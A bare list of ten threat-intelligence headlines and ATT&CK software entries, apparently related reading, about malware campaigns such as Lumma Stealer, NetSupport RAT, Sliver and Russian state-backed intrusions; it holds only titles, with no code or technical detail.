• UAC-0252 Attack Detection: SHADOWSNIFF and SALATSTEALER Fuel Phishing Campaigns in Ukraine
• SmartApeSG campaign pushes Remcos RAT, NetSupport RAT, StealC, and Sectop RAT
• Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations
• Russian Military Cyber Actors Target US and Global Critical Infrastructure
• FancyBear Exposed: Major OPSEC Blunder Inside Russian Espionage Ops
• Hackers Exploit ClickFix Tactics to Spread NetSupport RAT, Latrodectus, and Lumma Stealer
• Lumma Stealer, Software S1213
• RCE to Sliver: IR Tales from the Field
• Sliver, Software S0633
• Stan Ghouls attacks in Russia and Uzbekistan